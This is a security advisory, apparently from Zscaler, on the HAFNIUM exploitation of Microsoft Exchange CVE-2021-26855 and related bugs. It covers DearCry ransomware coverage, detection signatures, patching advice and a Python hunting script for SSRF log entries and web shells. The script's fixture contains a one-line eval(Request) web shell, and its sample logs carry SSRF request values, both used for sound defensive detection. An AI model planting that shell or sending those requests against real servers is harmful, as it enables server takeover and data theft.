Update [19-Mar-2021]
Microsoft has released the Microsoft Exchange On-Premises Mitigation Tool on GitHub and published a blog post with step-by-step instructions for using it. This is a free, one-click tool designed to help customers who have not yet applied the on-premises Exchange security update to temporarily protect their servers prior to patching; it is a stop-gap, not a replacement for the update. Microsoft has also issued guidance for responders investigating and remediating these Exchange Server vulnerabilities.
There have also been reports of threat actors deploying a new ransomware family, DearCry, after compromising Microsoft Exchange servers through the disclosed vulnerabilities.
Zscaler Coverage
Zscaler has added coverage for the DearCry ransomware family and for the web shells found deployed on compromised servers, using Advanced Threat Signatures and the Advanced Cloud Sandbox.
- Advanced Threat Protection
Win32.Ransom.DearCry
HTML.Webshell.Hafnium
Win32.Backdoor.Hafnium
- Advanced Cloud Sandbox
Win32.Ransom.DearCry
[End of Update]
Background
Microsoft has reported multiple exploits being used against on-premises versions of Microsoft Exchange Server in limited and targeted attacks [1]. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers, which enabled access to email accounts and allowed installation of additional malware to facilitate long-term access to victim environments. The Microsoft Threat Intelligence Center (MSTIC) has attributed this campaign to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.
What is the issue?
The following vulnerabilities were being exploited, chained together:
CVE-2021-26855: Server-side request forgery (SSRF) vulnerability in Exchange which allows an unauthenticated attacker with network access to the server to send arbitrary HTTP requests and authenticate as the Exchange server. This is the entry point of the chain; the remaining three bugs require authentication or elevated access, which this one supplies.
CVE-2021-26857: Insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when untrusted, user-controllable data is deserialized by a program. Exploiting this vulnerability gave the attacker the ability to run code as SYSTEM on the Exchange server. It requires administrator permission or another vulnerability to exploit.
CVE-2021-26858: Post-authentication arbitrary file write vulnerability in Exchange. If the attacker could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
CVE-2021-27065: Post-authentication arbitrary file write vulnerability in Exchange. If the attacker could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.
What products are impacted?
- Microsoft Exchange Server 2019
- Microsoft Exchange Server 2016
- Microsoft Exchange Server 2013
How can you identify if you have been compromised?
Detection guidance and advanced hunting queries to help customers investigate this activity have been published by Microsoft [1]. Two of the most useful indicators: HttpProxy log entries with an empty AuthenticatedUser whose AnchorMailbox begins with "ServerInfo~" (CVE-2021-26855 SSRF requests), and newly written .aspx files in the Exchange front-end and aspnet_client directories (web shells).
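The two checks above, worked through as an added example (this is not Zscaler's or Microsoft's code). It parses Exchange HttpProxy logs for the published CVE-2021-26855 indicator (empty AuthenticatedUser plus an AnchorMailbox of the form ServerInfo~host/path) and sweeps the directories where HAFNIUM web shells were observed for .aspx files that are recently modified or contain a one-line eval(Request[...]) loader. The log excerpt, its abbreviated field list, the sample mailbox values and the web-root fixture are all constructed for the example; the content heuristic is ours, not a published signature.

```python
"""Hunt for two HAFNIUM indicators on an Exchange server: CVE-2021-26855
SSRF requests in HttpProxy logs, and recently written ASP.NET web shells.
The sample log rows and the web-root fixture are constructed for this
example and use only a subset of the real HttpProxy log fields.
"""
import csv
import io
import os
import re
import tempfile
import time
from typing import Dict, Iterable, List

# Microsoft's published indicator for CVE-2021-26855: a request with an
# empty AuthenticatedUser whose AnchorMailbox is "ServerInfo~<target>/<path>".
ANCHOR_PATTERN = re.compile(r"^ServerInfo~[^/]*/")

# Constructed HttpProxy excerpt. Real logs start with '#' comment lines
# before the CSV header; the parser skips them. Rows bbb and ddd are the
# SSRF shape, rows aaa and ccc are ordinary authenticated OWA/ECP traffic.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T10:00:01.000Z,aaa,10.0.0.5,/owa/,CORP\\alice,Sid~S-1-5-21-1-2-3-1001,200
2021-03-03T10:00:02.000Z,bbb,203.0.113.7,/owa/auth/x.js,,ServerInfo~a]@exchange.corp.local:444/autodiscover/autodiscover.xml?#,200
2021-03-03T10:00:03.000Z,ccc,10.0.0.9,/ecp/,CORP\\bob,Sid~S-1-5-21-1-2-3-1002,200
2021-03-03T10:00:04.000Z,ddd,203.0.113.7,/ecp/y.js,,ServerInfo~localhost/ecp/DDI/DDIService.svc/SetObject,200
"""

# Directories where HAFNIUM web shells were observed, per Microsoft's write-up.
WEBSHELL_DIRS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\inetpub\wwwroot\aspnet_client\system_web",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\Exchange\FrontEnd\HttpProxy\owa\auth",
]

# Heuristic (ours, not a published signature): a server-side script block
# that evals a request parameter, the shape of the one-line China Chopper
# style shells dropped in this campaign.
WEBSHELL_CONTENT = re.compile(r'runat\s*=\s*"server".*?eval\s*\(\s*Request',
                              re.IGNORECASE | re.DOTALL)


def parse_httpproxy_log(text: str) -> List[Dict[str, str]]:
    """Parse an Exchange HttpProxy log, skipping the leading '#' comment lines."""
    data = [ln for ln in text.splitlines() if ln and not ln.startswith("#")]
    return list(csv.DictReader(io.StringIO("\n".join(data))))


def find_ssrf_requests(rows: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return rows matching the CVE-2021-26855 exploitation indicator."""
    return [r for r in rows
            if r.get("AuthenticatedUser", "") == ""
            and ANCHOR_PATTERN.match(r.get("AnchorMailbox", ""))]


def find_suspect_aspx(roots: Iterable[str], since_epoch: float) -> List[str]:
    """Return .aspx files under roots modified after since_epoch or whose
    content matches the eval(Request) loader pattern. Missing roots are
    skipped so the sweep can run unchanged on any host."""
    suspects = []
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if not name.lower().endswith(".aspx"):
                    continue
                path = os.path.join(dirpath, name)
                try:
                    recent = os.path.getmtime(path) >= since_epoch
                    with open(path, "r", errors="replace") as fh:
                        body = fh.read(65536)  # shells are tiny; cap the read
                except OSError:
                    continue
                if recent or WEBSHELL_CONTENT.search(body):
                    suspects.append(path)
    return sorted(suspects)


def scan_constructed_webroot() -> List[str]:
    """Build a constructed web root (an old clean page, an old shell-like
    page, a freshly written clean page) and return the flagged basenames."""
    root = tempfile.mkdtemp(prefix="owa_auth_")
    now = time.time()
    old = now - 30 * 86400
    fixtures = {
        "logon.aspx": ('<%@ Page Language="C#" %><html>sign in</html>', old),
        "help.aspx": ('<script language="JScript" runat="server">'
                      'function Page_Load(){eval(Request["cmd"],"unsafe");}'
                      '</script>', old),
        "new.aspx": ('<%@ Page Language="C#" %><html>ok</html>', now),
    }
    for name, (body, mtime) in fixtures.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return [os.path.basename(p)
            for p in find_suspect_aspx([root], since_epoch=now - 3600)]


if __name__ == "__main__":
    for hit in find_ssrf_requests(parse_httpproxy_log(SAMPLE_HTTPPROXY_LOG)):
        print("SSRF:", hit["DateTime"], hit["ClientIpAddress"], hit["AnchorMailbox"])
    print("web shell candidates (fixture):", scan_constructed_webroot())
    # On a real server, call find_suspect_aspx(WEBSHELL_DIRS, <patch time>)
    # and feed it the HttpProxy logs under
    # %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy.
```

Every hit is a lead, not a verdict: a legitimate recent .aspx modification (for example, from patching) will show up in the sweep, and the log check only confirms that the SSRF request shape reached the server, so pair it with the source IP and the rest of Microsoft's guidance before declaring compromise.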
What can you do to protect yourself?
- Ensure that your users always have the Zscaler Client Connector running to ensure coverage against these exploits.
- We highly recommend installing the latest security updates for the products affected by these CVEs [2]; mitigations only reduce exposure until the update is applied.
- Keep your security software up to date with the latest definitions.
- Reduce the attack surface by limiting these servers' exposure to the internet, for example by restricting inbound access to the Exchange HTTPS (port 443) endpoints to trusted networks, since the SSRF entry point needs only network reachability.
Zscaler coverage
The following signature detections are now in production for Zscaler customers:
- Advanced Threat Protection
HTML.Exploit.CVE-2021-26855
Win32.Exploit.Nishang
PS.Hacked.PowerCat
- Advanced Cloud Sandbox
Win32.Exploit.CVE-2021-26855
- Advanced Cloud Firewall
HTML.Exploit.CVE-2021-26855
Win32.Trojan.ProcdumpExfil
Win64.Trojan.ProcdumpExfil
Details related to these threat signatures can be found in the Zscaler Threat Library.
The Zscaler Cloud Sandbox will provide proactive coverage against weaponised payloads trying to exploit these vulnerabilities. The Zscaler ThreatLabZ team is also actively monitoring and ensuring coverage for all the latest IOCs associated with these vulnerabilities targeting Microsoft Exchange servers.
References
1. https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
2. https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
3. https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/